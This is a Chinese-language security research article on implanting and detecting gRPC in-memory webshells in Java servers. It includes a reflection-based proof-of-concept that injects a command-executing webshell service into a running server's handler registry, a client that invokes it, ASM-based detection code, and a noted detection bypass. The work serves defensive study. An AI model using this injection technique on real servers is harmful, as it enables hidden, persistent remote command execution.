0
  • 聊天消息
  • 系統(tǒng)消息
  • 評(píng)論與回復(fù)
登錄后你可以
  • 下載海量資料
  • 學(xué)習(xí)在線課程
  • 觀看技術(shù)視頻
  • 寫文章/發(fā)帖/加入社區(qū)
會(huì)員中心
創(chuàng)作中心

完善資料讓更多小伙伴認(rèn)識(shí)你,還能領(lǐng)取20積分哦,立即完善>

3天內(nèi)不再提示

gRPC內(nèi)存馬研究與查殺

冬至子 ? 來源:小陳的Life ? 作者:Leiothrix ? 2023-06-01 11:24 ? 次閱讀

0****2

gRPC介紹

了解gRPC之前,就需要引入RPC的設(shè)計(jì)理念,才能更好的理解gRPC的工作原理。

遠(yuǎn)程過程調(diào)用(Remote Procedure Call,縮寫為 RPC)是一個(gè)計(jì)算機(jī)通信協(xié)議。該協(xié)議允許一臺(tái)計(jì)算上的程序調(diào)用另一臺(tái)計(jì)算機(jī)上運(yùn)行的程序,使得程序員無需再做額外的操作。如果是面向?qū)ο蟮膱鼍?,也可以稱作為遠(yuǎn)程方法調(diào)用,比如熟知的Java RMI(Remote Method Invocation)調(diào)用。

圖片

而gRPC是由Google開發(fā)的一款高性能的開源RPC框架,經(jīng)常用于微服務(wù)之間各種不同語言的程序調(diào)用函數(shù)和通信,大大的增加了微服務(wù)之間的通信效率和平臺(tái)依賴性。同時(shí)gRPC是使用Protocol buffers作為接口定義語言(IDL),可以通過編寫的proto文件來定義消息結(jié)構(gòu)體和RPC遠(yuǎn)程調(diào)用函數(shù)。

協(xié)調(diào)的接口是通過proto文件來定義的消息結(jié)構(gòu),相關(guān)文檔可以在Reference[1]中找到。再來看看gRPC的接口定義語言Protocol Buffers的工作流程圖:

圖片

結(jié)合后續(xù)的案例說明,proto文件定義好之后需要通過生成器生成對(duì)應(yīng)語言的代碼,并在項(xiàng)目中使用才可以建立gRPC調(diào)用。

03

案例說明

這里直接用綠盟星云實(shí)驗(yàn)室開源的gRPC靶場來研究:https://github.com/snailll/gRPCDemo

首先直接看看他的user.proto是如何定義的

syntax = "proto3";
package protocol;




option go_package = "protocol";
option java_multiple_files = true;
option java_package = "com.demo.shell.protocol";


message User {
  int32 userId = 1;
  string username = 2;
  sint32 age = 3;
  string name = 4;
}


service UserService {
  rpc getUser (User) returns (User) {}
  rpc getUsers (User) returns (stream User) {}
  rpc saveUsers (stream User) returns (User) {}
}

可以看到文件中定義了go_package和java_package兩個(gè)變量,用處是明確指出包的命名空間,防止與其他語言的名稱沖突。而java_multiple_files = true 選項(xiàng)則是允許為每個(gè)生成的類,生成一個(gè)單獨(dú)的 .java 文件。

定義好了proto文件之后,就可以通過protoc或者maven的插件來生成grpc代碼,這里我用的protoc二進(jìn)制文件和插件protoc-gen-grpc來生成。

用下列兩個(gè)命令生成對(duì)應(yīng)的Java代碼文件:

protoc -I=. --java_out=./codes/ user.proto


protoc.exe --plugin=protoc-gen-grpc-java.exe --grpc-java_out=./code --proto_path=. user.proto

這里的grpc插件一定要重新命名為"protoc-gen-grpc-java",不然會(huì)顯示找不到命令。

之后會(huì)在codes文件中生成對(duì)象關(guān)系的java文件,code文件夾中生成grpc相關(guān)的UserServiceGrpc.java文件。

把生成好的Java文件添加到開發(fā)的項(xiàng)目中,并新建一個(gè)UserServiceImpl類,用來實(shí)現(xiàn)grpc的方法。

package com.demo.shell.service;


import com.demo.shell.protocol.User;
import com.demo.shell.protocol.UserServiceGrpc;
import io.grpc.stub.StreamObserver;




/**
 * @author demo
 * @date 2022/11/27
 */
public class UserServiceImpl extends UserServiceGrpc.UserServiceImplBase {
    @Override
    public void getUser(User request, StreamObserver< User > responseObserver) {
        System.out.println(request);
        User user = User.newBuilder()
                .setName("response name")
                .build();
        responseObserver.onNext(user);
        responseObserver.onCompleted();
    }


    @Override
    public void getUsers(User request, StreamObserver< User > responseObserver) {
        System.out.println("get users");
        System.out.println(request);
        User user = User.newBuilder()
                .setName("user1")
                .build();
        User user2 = User.newBuilder()
                .setName("user2")
                .build();
        responseObserver.onNext(user);
        responseObserver.onNext(user2);
        responseObserver.onCompleted();
    }


    @Override
    public StreamObserver< User > saveUsers(StreamObserver< User > responseObserver) {


        return new StreamObserver< User >() {
            @Override
            public void onNext(User user) {
                System.out.println("get saveUsers list ---- >");
                System.out.println(user);
            }


            @Override
            public void onError(Throwable throwable) {
                System.out.println("saveUsers error " + throwable.getMessage());
            }


            @Override
            public void onCompleted() {
                User user = User.newBuilder()
                        .setName("saveUsers user1")
                        .build();
                responseObserver.onNext(user);
                responseObserver.onCompleted();
            }
        };
    }
}

在創(chuàng)建一個(gè)Main方法啟動(dòng)Netty服務(wù)

public static void main(String[] args) throws Exception {
    int port = 8082;
    Server server = NettyServerBuilder
        .forPort(port)
        .addService(new UserServiceImpl())
        .build()
        .start();
    System.out.println("server started, port : " + port);
    server.awaitTermination();
}

圖片

再編寫客戶端調(diào)用服務(wù)器方法

package com.demo.shell.test;


import com.demo.shell.protocol.User;
import com.demo.shell.protocol.UserServiceGrpc;
import io.grpc.ManagedChannel;
import io.grpc.ManagedChannelBuilder;


import java.util.Iterator;


/**
 * @author demo
 * @date 2022/11/27
 */
public class NsTest {
    public static void main(String[] args) {


        User user = User.newBuilder()
                .setUserId(100)
                .build();


        String host = "127.0.0.1";
        int port = 8082;
        ManagedChannel channel = ManagedChannelBuilder.forAddress(host, port).usePlaintext().build();
        UserServiceGrpc.UserServiceBlockingStub userServiceBlockingStub = UserServiceGrpc.newBlockingStub(channel);
        User responseUser = userServiceBlockingStub.getUser(user);
        System.out.println(responseUser);


        Iterator< User > users = userServiceBlockingStub.getUsers(user);
        while (users.hasNext()) {
            System.out.println(users.next());
        }


        channel.shutdown();
    }
}

服務(wù)器輸出對(duì)應(yīng)的參數(shù)請(qǐng)求內(nèi)容

圖片

04

gRPC內(nèi)存馬實(shí)現(xiàn)原理

先從服務(wù)端啟動(dòng)來看看UserServiceImpl是如何注冊的

int port = 8082;
Server server = NettyServerBuilder
    .forPort(port)
    .addService(new UserServiceImpl())
    .build()
    .start();

forPort這里只是新建了一個(gè)NettyServerBuilder類,并設(shè)置了啟動(dòng)服務(wù)需要綁定的端口

而到addService方法中,新建的UserServiceImpl類作為參數(shù)傳遞進(jìn)了方法體中

public T addService(BindableService bindableService) {
    this.delegate().addService(bindableService);
    return this.thisT();
}

代碼中的this.delegate()就是io.grpc.internal.ServerImplBuilder類

跟進(jìn)查看

圖片

看到addService方法中添加的其實(shí)是bindService的返回值。

圖片

這里的正好是之前grpc插件生成的UserServiceGrpc類

@java.lang.Override public final io.grpc.ServerServiceDefinition bindService() {
    return io.grpc.ServerServiceDefinition.builder(getServiceDescriptor())
        .addMethod(
        getGetUserMethod(),
        io.grpc.stub.ServerCalls.asyncUnaryCall(
            new MethodHandlers<
            com.demo.shell.protocol.User,
            com.demo.shell.protocol.User >(
                this, METHODID_GET_USER)))
        .addMethod(
        getGetUsersMethod(),
        io.grpc.stub.ServerCalls.asyncServerStreamingCall(
            new MethodHandlers<
            com.demo.shell.protocol.User,
            com.demo.shell.protocol.User >(
                this, METHODID_GET_USERS)))
        .addMethod(
        getSaveUsersMethod(),
        io.grpc.stub.ServerCalls.asyncClientStreamingCall(
            new MethodHandlers<
            com.demo.shell.protocol.User,
            com.demo.shell.protocol.User >(
                this, METHODID_SAVE_USERS)))
        .build();
}

里面的代碼正好對(duì)應(yīng)proto文件中定義的三個(gè)方法名

addService添加了需要注冊的方法,之后就是通過Build方法編譯好且設(shè)置不可修改。

public Server build() {
    return new ServerImpl(this, this.clientTransportServersBuilder.buildClientTransportServers(this.getTracerFactories()), Context.ROOT);
}

Build方法中創(chuàng)建了ServerImpl對(duì)象,再來看看ServerImpl對(duì)象的構(gòu)造方法

ServerImpl(ServerImplBuilder builder, InternalServer transportServer, Context rootContext) {
    this.executorPool = (ObjectPool)Preconditions.checkNotNull(builder.executorPool, "executorPool");
    this.registry = (HandlerRegistry)Preconditions.checkNotNull(builder.registryBuilder.build(), "registryBuilder");
    ...
}

主要是關(guān)注builder.registryBuilder.build()方法,進(jìn)入的正好是io.grpc.internal.InternalHandlerRegistry$Builder類的build方法。

static final class Builder {
    private final HashMap< String, ServerServiceDefinition > services = new LinkedHashMap();


    Builder() {
    }


    InternalHandlerRegistry.Builder addService(ServerServiceDefinition service) {
        this.services.put(service.getServiceDescriptor().getName(), service);
        return this;
    }


    InternalHandlerRegistry build() {
        Map< String, ServerMethodDefinition< ?, ? >> map = new HashMap();
        Iterator var2 = this.services.values().iterator();


        while(var2.hasNext()) {
            ServerServiceDefinition service = (ServerServiceDefinition)var2.next();
            Iterator var4 = service.getMethods().iterator();


            while(var4.hasNext()) {
                ServerMethodDefinition< ?, ? > method = (ServerMethodDefinition)var4.next();
                map.put(method.getMethodDescriptor().getFullMethodName(), method);
            }
        }


        return new InternalHandlerRegistry(Collections.unmodifiableList(new ArrayList(this.services.values())), Collections.unmodifiableMap(map));
    }
}

最后返回的Collections.unmodifiableList和Collections.unmodifiableMap,就是將list列表和map轉(zhuǎn)換成無法修改的對(duì)象,因此注冊的UserServiceImpl對(duì)象中的方法從一開始就確定了。

圖片

至此,內(nèi)存馬的實(shí)現(xiàn)步驟就可以得知,需要通過反射重新定義ServerImpl對(duì)象中的this.registry值,添加進(jìn)我們內(nèi)存馬的ServerServiceDefinition和ServerMethodDefinition。

05

內(nèi)存馬注入

由于M01N Team公眾號(hào)中并未直接給出poc利用,這里我也只能憑借自己的想法慢慢復(fù)現(xiàn)。

由于需用反射替換掉原先被設(shè)置unmodifiable的ServerServiceDefinition和ServerMethodDefinition,因此就需要ServerImpl對(duì)象的句柄。

圖片

由于ServerImpl并不是靜態(tài)的類,需要獲取的字段也不是靜態(tài)的,因此要獲取到JVM中ServerImpl的類,可目前為止我沒有想到有什么很好的方式獲取。如果讀者們有更好的思路可以留言給我,歡迎相互討論學(xué)習(xí)。

注入的思路,就是先獲取ServerImpl中已經(jīng)有的ServerServiceDefinition和ServerMethodDefinition,讀取到新的List和Map中,并在新的List和Map中添加WebShell內(nèi)存馬的信息,最后再設(shè)置unmodifiable屬性并更改registry對(duì)象的值。

Poc如下所示,需要提供ServerImpl對(duì)象的實(shí)例。

public static void changeGRPCService(Server server){
    try {
        Field field = server.getClass().getDeclaredField("registry");
        field.setAccessible(true);
        Object registry = field.get(server);
        Class< ? > handler = Class.forName("io.grpc.internal.InternalHandlerRegistry");
        Field services = handler.getDeclaredField("services");
        services.setAccessible(true);
        List servicesList = (List) services.get(registry);
        List< Object > newServicesList = new ArrayList< Object >(servicesList);


        //調(diào)用WebShell的bindService
        Class< ? > cls = Class.forName("com.demo.shell.protocol.WebShellServiceGrpc$WebShellServiceImplBase");
        Method m = cls.getDeclaredMethod("bindService");
        BindableService obj = new WebshellServiceImpl();
        ServerServiceDefinition service = (ServerServiceDefinition) m.invoke(obj);


        newServicesList.add(service);    //添加新的Service到List中
        services.set(registry, Collections.unmodifiableList(newServicesList));
        Field methods = handler.getDeclaredField("methods");
        methods.setAccessible(true);
        Map methodsMap = (Map) methods.get(registry);
        Map< String,Object > newMethodsMap = new HashMap< String,Object >(methodsMap);


        for (ServerMethodDefinition< ?, ? > serverMethodDefinition : service.getMethods()) {
            newMethodsMap.put(serverMethodDefinition.getMethodDescriptor().getFullMethodName(), serverMethodDefinition);
        }
        methods.set(registry,Collections.unmodifiableMap(newMethodsMap));
    } catch (Exception e) {
        e.printStackTrace();
    }
}

上面的代碼片段只是一個(gè)demo版本,具體的實(shí)現(xiàn)需要把WebShellServiceGrpc類轉(zhuǎn)成字節(jié)碼,再Definition到JVM中。

注入完成后,在客戶端執(zhí)行如下代碼調(diào)用即可:

package com.demo.shell.test;


import com.demo.shell.protocol.WebShellServiceGrpc;
import com.demo.shell.protocol.Webshell;
import io.grpc.ManagedChannel;
import io.grpc.ManagedChannelBuilder;


/**
 * @author demo
 * @date 2022/11/27
 */
public class NsTestShell {
    public static void main(String[] args) {


        Webshell webshell = Webshell.newBuilder()
                .setPwd("x")
                .setCmd("calc")
                .build();


        String host = "127.0.0.1";
        int port = 8082;
        ManagedChannel channel = ManagedChannelBuilder.forAddress(host, port).usePlaintext().build();


        WebShellServiceGrpc.WebShellServiceBlockingStub webShellServiceBlockingStub = WebShellServiceGrpc.newBlockingStub(channel);
        Webshell s = webShellServiceBlockingStub.exec(webshell);
        System.out.println(s.getCmd());
        try {
            Thread.sleep(5000);
        } catch (InterruptedException e) {
            e.printStackTrace();
        }
        channel.shutdown();
    }
}

圖片

而原本公眾號(hào)中給出的防御方式是通過RASP技術(shù)對(duì)動(dòng)態(tài)修改Service對(duì)象的行為做出攔截。其實(shí)我個(gè)人覺得這里不太好埋點(diǎn),比如我可以對(duì)Service的上層對(duì)象registry直接做修改,或者我對(duì)Services對(duì)象的某個(gè)ServerServiceDefinition做修改,不做添加而只是修改原來已經(jīng)存在的Method,操作的對(duì)象就不需要再更改Services的值。

06

gRPC內(nèi)存馬查殺

首先在Agent中的transform方法中用ASM消費(fèi)所有的類

ClassReader reader = new ClassReader(bytes);
ClassWriter writer = new ClassWriter(reader, 0);
GrpcClassVisitor visitor = new GrpcClassVisitor(writer,Grpc_Methods_list);
reader.accept(visitor, 0);

這里的GrpcClassVisitor就是當(dāng)前類的父類的接口是否繼承自io.grpc.BindableService,如果是,則說明這是一個(gè)gRPC實(shí)現(xiàn)類,因此當(dāng)中定義的方法都可以是危險(xiǎn)函數(shù),需要進(jìn)一步使用可達(dá)性分析判斷是否有危險(xiǎn)Sink函數(shù)。

package com.websocket.findMemShell;


import java.util.List;


import org.objectweb.asm.ClassVisitor;
import org.objectweb.asm.ClassWriter;
import org.objectweb.asm.MethodVisitor;
import org.objectweb.asm.Opcodes;




public class GrpcClassVisitor extends ClassVisitor {

  private String ClassName = null;
  private List< String > Grpc_Methods_list;


    public GrpcClassVisitor(ClassWriter writer,List< String > Grpc_Methods_list) {
        super(Opcodes.ASM4, writer);
        this.Grpc_Methods_list = Grpc_Methods_list;
    }


    @Override
    public void visit(int version, int access, String name, String signature, String superName, String[] interfaces) {
        if(superName.contains("ServiceGrpc")) {
          try {
          String cls = Thread.currentThread().getContextClassLoader().loadClass(superName.replaceAll("/", "\\\\.")).getInterfaces()[0].getName();
          if(cls.equals("io.grpc.BindableService")) {
            //System.out.println("SuperName Class:"+cls);
            this.ClassName = name;
          }

            } catch (ClassNotFoundException e) {
          // TODO Auto-generated catch block
          e.printStackTrace();
        }
        }
      super.visit(version, access, name, signature, superName, interfaces);
    }

    @Override
    public MethodVisitor visitMethod(int access, String name, String desc, String signature, String[] exceptions) {
      MethodVisitor methodVisitor = cv.visitMethod(access, name, desc, signature, exceptions);
      if(this.ClassName == null) {
        return methodVisitor;
      }else {
        return new MyMethodVisitor(methodVisitor, access, name, desc,this.ClassName,this.Grpc_Methods_list);
      }

    }

    class MyMethodVisitor extends MethodVisitor implements Opcodes {
      private String MethodName;
      private String ClassName;
      private List< String > Grpc_Methods_list;
        public MyMethodVisitor(MethodVisitor mv, final int access, final String name, final String desc,String ClassName,List< String > Grpc_Methods_list) {
            super(Opcodes.ASM5, mv);
            this.MethodName = name;
            this.ClassName = ClassName;
            this.Grpc_Methods_list = Grpc_Methods_list;
        }

        @Override
        public void visitMethodInsn(final int opcode, final String owner,
                final String name, final String desc, final boolean itf) {

          if(!this.Grpc_Methods_list.contains(this.ClassName+"#"+this.MethodName)) {
            this.Grpc_Methods_list.add(this.ClassName+"#"+this.MethodName);
            //System.out.println(this.ClassName+"#"+this.MethodName);
            }
            super.visitMethodInsn(opcode, owner, name, desc, itf);
        }
    }
}

判斷函數(shù)邏輯:

if(discoveredCalls.containsKey(cp.getClassName().replaceAll("\\\\.", "/"))) {
    List< String > list = discoveredCalls.get(cp.getClassName().replaceAll("\\\\.", "/"));
    for(String str : list) {
        if(dfsSearchSink(str)) {
            stack.push(str);
            stack.push(cp.getClassName().replaceAll("\\\\.", "/"));
            StringBuilder sb = new StringBuilder();
            while(!stack.empty()) {
                sb.append("- >");
                sb.append(stack.pop());
            }
            System.out.println("Controller CallEdge: "+sb.toString());
            break;
        }
    }
}

這樣的好處可以查找出系統(tǒng)中g(shù)RPC的內(nèi)存馬。

圖片

缺點(diǎn)是在查找gRPC實(shí)現(xiàn)類的時(shí)候,需要用到當(dāng)前線程的ClassLoader判斷父類是否繼承自io.grpc.BindableService,因此攻擊的時(shí)候只需要更改加載的ClassLoader即可繞過。

圖片

聲明:本文內(nèi)容及配圖由入駐作者撰寫或者入駐合作網(wǎng)站授權(quán)轉(zhuǎn)載。文章觀點(diǎn)僅代表作者本人,不代表電子發(fā)燒友網(wǎng)立場。文章及其配圖僅供工程師學(xué)習(xí)之用,如有內(nèi)容侵權(quán)或者其他違規(guī)問題,請(qǐng)聯(lián)系本站處理。 舉報(bào)投訴
  • RPC
    RPC
    +關(guān)注

    關(guān)注

    0

    文章

    111

    瀏覽量

    11540
  • 生成器
    +關(guān)注

    關(guān)注

    7

    文章

    315

    瀏覽量

    21028
  • JVM
    JVM
    +關(guān)注

    關(guān)注

    0

    文章

    158

    瀏覽量

    12236
  • 計(jì)算機(jī)通信
    +關(guān)注

    關(guān)注

    1

    文章

    26

    瀏覽量

    8439
收藏 人收藏

    評(píng)論

    相關(guān)推薦

    GRPC的基礎(chǔ)使用方法

    gRPC 是 Google 開源的高性能、通用的 RPC 框架,它采用了基于 HTTP/2 協(xié)議的二進(jìn)制傳輸協(xié)議,支持多種語言,包括 Rust。Rust 語言 GRPC 模塊是一個(gè)用于 Rust
    的頭像 發(fā)表于 09-19 16:08 ?954次閱讀

    云如是說

    顯微鏡下進(jìn)行分析研究的又一起因。互聯(lián)網(wǎng)在公司經(jīng)營中發(fā)揮著越來越大的作用,如何正確看待互聯(lián)網(wǎng)的意義?如何有效地利用互聯(lián)網(wǎng)為公司的贏利目標(biāo)服務(wù)?相信讀者們能從云的話語中得到很多啟迪。這,是我們決定在此時(shí)期選擇云作為中國企業(yè)家范例
    發(fā)表于 07-16 18:50

    一鍵清理網(wǎng)站木馬文件,從此網(wǎng)站擁有專屬保鏢 ——阿里云虛擬主機(jī)推出木馬查殺功能

    摘要: 近日,阿里云推出了云虛擬主機(jī)網(wǎng)站木馬查殺的新功能,十分適合對(duì)網(wǎng)站安全不了解、不熟悉的用戶,或網(wǎng)站出現(xiàn)掛情況不清楚如何處理的用戶。 阿里云表示,此次網(wǎng)站木馬查殺功能是阿里云安騎士專為虛擬主機(jī)
    發(fā)表于 01-04 12:08

    安瓿智能視覺檢測機(jī)器人研究_

    安瓿智能視覺檢測機(jī)器人研究_
    發(fā)表于 01-19 21:54 ?0次下載

    熊貓燒香病毒怎樣進(jìn)行手動(dòng)查殺

    手動(dòng)查殺:只不通過代碼的方式對(duì)病毒進(jìn)行查殺,通過鼠標(biāo)指指點(diǎn)點(diǎn)+DOS命令實(shí)現(xiàn)殺毒 粗淺,往往不能查殺干凈 并不代表什么軟件都不用,專業(yè)分析軟件 手動(dòng)查殺病毒木馬固定的流程: 1. 排查
    發(fā)表于 10-09 18:28 ?1次下載
    熊貓燒香病毒怎樣進(jìn)行手動(dòng)<b class='flag-5'>查殺</b>

    谷歌開源高性能通用RPC框架gRPC

    谷歌開源了 gRPC-Kotlin/JVM,讓開發(fā)者可以在 Kotlin 項(xiàng)目中更方便地使用 gRPC,以更簡單的方式構(gòu)建可靠的網(wǎng)絡(luò)連接服務(wù)。
    的頭像 發(fā)表于 04-20 14:43 ?2767次閱讀
    谷歌開源高性能通用RPC框架<b class='flag-5'>gRPC</b>

    如何在虛擬環(huán)境下進(jìn)行病毒的查殺詳細(xì)資料概述

    傳統(tǒng)的安全服務(wù)大多將病毒查殺實(shí)體置于用戶的操作內(nèi)部,會(huì)產(chǎn)生大量資源開銷和浪費(fèi),且病毒查殺的程序本身就處于不安全的環(huán)境,容易遭到惡意程序的破壞,很難保證安全服務(wù)的完整性。為此,提出一種無代理的病毒查殺
    發(fā)表于 11-03 16:31 ?13次下載
    如何在虛擬環(huán)境下進(jìn)行病毒的<b class='flag-5'>查殺</b>詳細(xì)資料概述

    基于改進(jìn)SIFT和RANSAC圖像拼接算法研究_強(qiáng)

    基于改進(jìn)SIFT和RANSAC圖像拼接算法研究_強(qiáng)(怎樣測監(jiān)控電源電流)-基于改進(jìn)SIFT和RANSAC圖像拼接算法研究_強(qiáng)這是一份非常不錯(cuò)的資料,歡迎下載,希望對(duì)您有幫助!
    發(fā)表于 07-26 12:53 ?12次下載
    基于改進(jìn)SIFT和RANSAC圖像拼接算法<b class='flag-5'>研究</b>_<b class='flag-5'>馬</b>強(qiáng)

    IP知識(shí)百科之什么是gRPC

    gRPC Google遠(yuǎn)程過程調(diào)用(Google Remote Procedure Call,gRPC)協(xié)議是谷歌發(fā)布的高性能、通用的開源RPC軟件框架。gRPC提供了多種編程語言,同時(shí)gRP
    的頭像 發(fā)表于 11-16 15:13 ?3276次閱讀

    FindShell內(nèi)存查殺工具

    FindShell.zip
    發(fā)表于 05-06 11:57 ?3次下載
    FindShell<b class='flag-5'>內(nèi)存</b><b class='flag-5'>馬</b><b class='flag-5'>查殺</b>工具

    gRPC-Nebula微服務(wù)框架

    ./oschina_soft/grpc-nebula.zip
    發(fā)表于 06-22 14:59 ?0次下載
    <b class='flag-5'>gRPC</b>-Nebula微服務(wù)框架

    gRPC-Web訪問gRPC服務(wù)的Web客戶端

    ./oschina_soft/grpc-web.zip
    發(fā)表于 06-22 09:25 ?0次下載
    <b class='flag-5'>gRPC</b>-Web訪問<b class='flag-5'>gRPC</b>服務(wù)的Web客戶端

    正確使用gRPC與GraphQL

    TLDR:使用 GraphQL 進(jìn)行客戶端-服務(wù)器通信,使用 gRPC 進(jìn)行服務(wù)器到服務(wù)器通信。有關(guān)此規(guī)則的例外情況,請(qǐng)參閱“判定”部分。 我已經(jīng)閱讀了很多關(guān)于這兩種協(xié)議的比較,并想寫一個(gè)全面和公正
    的頭像 發(fā)表于 12-08 15:47 ?1111次閱讀

    什么是gRPC

    相信大家對(duì)RPC協(xié)議都有一定的了解,并且或多或少都會(huì)在項(xiàng)目中涉及,但可能都和小編類似,都是直接使用平臺(tái)封裝的插件,對(duì)于其中的原理不是很了解,今天借此機(jī)會(huì)和大家分享下最近接觸的RPC框架-grpc
    的頭像 發(fā)表于 10-07 16:24 ?706次閱讀

    使用go語言實(shí)現(xiàn)一個(gè)grpc攔截器

    在開發(fā)grpc服務(wù)時(shí),我們經(jīng)常會(huì)遇到一些通用的需求,比如:日志、鏈路追蹤、鑒權(quán)等。這些需求可以通過grpc攔截器來實(shí)現(xiàn)。本文使用go語言來實(shí)現(xiàn)一個(gè) grpc一元模式(Unary)攔截器,上報(bào)鏈路追蹤信息。
    的頭像 發(fā)表于 12-18 10:13 ?698次閱讀
    使用go語言實(shí)現(xiàn)一個(gè)<b class='flag-5'>grpc</b>攔截器